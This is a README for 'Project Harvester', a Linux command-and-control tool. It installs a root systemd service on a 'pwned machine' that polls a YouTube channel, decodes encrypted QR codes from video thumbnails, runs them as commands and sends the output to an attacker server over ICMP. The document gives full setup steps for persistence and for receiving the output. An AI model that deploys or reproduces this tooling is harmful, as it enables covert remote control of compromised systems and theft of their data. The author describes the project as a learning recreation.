Project Harvester is a program created to control Linux systems remotely by uploading videos to Youtube.
The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos use AES-encrypted values.
- Server that you control, with a public ip address to receive output
- Pwned machine, where you have the ability to create files and execute them as root
-
Create a new google account, or use an old one if you would like
-
Go to https://console.cloud.google.com/apis/credentials, create a new project, then create credentials, api key
-
Get the id from your youtube channel url : ex UCOaqVWZgdddtDMqmdze4Wvw
-
On your machine:
$ wget https://raw.githubusercontent.com/ninjawill543/Project-Harvester/main/setup.py ; python3 setup.py
- Follow the instructions until you get a setup complete message.
Copy all the files in the pwned folder to your victim server. By default, the youtube.service looks like this
[Unit]
Description=Youtube download
[Service]
User=root
WorkingDirectory=<directory_of_script e.g. /root>
ExecStart=listen.sh
Restart=always
[Install]
WantedBy=multi-user.target
You must replace this <directory_of_script e.g. /root> with the directory where your files will be stored.
Then follow these commands:
$ sudo mv youtube.service /etc/systemd/system/
$ sudo systemctl daemon-reload
$ sudo chown root:root /etc/systemd/system/youtube.service
$ sudo chmod +x listen.sh
$ python3 -m pip install -r requirements.txt
$ sudo systemctl enable youtube.service
$ sudo systemctl start youtube.service
$ sudo systemctl status youtube.service
Copy all the files in the server folder to your server. By default, the last two lines of the receive.py file contain
sniff(filter="icmp", prn=print_it_please, count=0)
#add iface="interface" to change sniffing interface
To change the interface on which the incoming traffic will be received, change your file to look like this:
sniff(filter="icmp", prn=print_it_please, count=0, iface="yourinterfacename")
$ python3 -m pip install -r requirements.txt
$ python3 -m pip install -r requirements.txt
First, run the qrcode_gen.py file and chose a string with the --string option. This string is the command you would like to be executed on the pwned server.
Next, start your receive.py running on your controlled server, and upload the generated video to your youtube channel.
Now you just have to wait for the command to be executed and the output sent to you.
The idea for this project was originally conceived by Ricardo Ruiz. I have recreated his project entirely from scratch with the aim of understanding how it works and adapting it for Linux systems.
This project has only been tested on Ubuntu 22.04 systems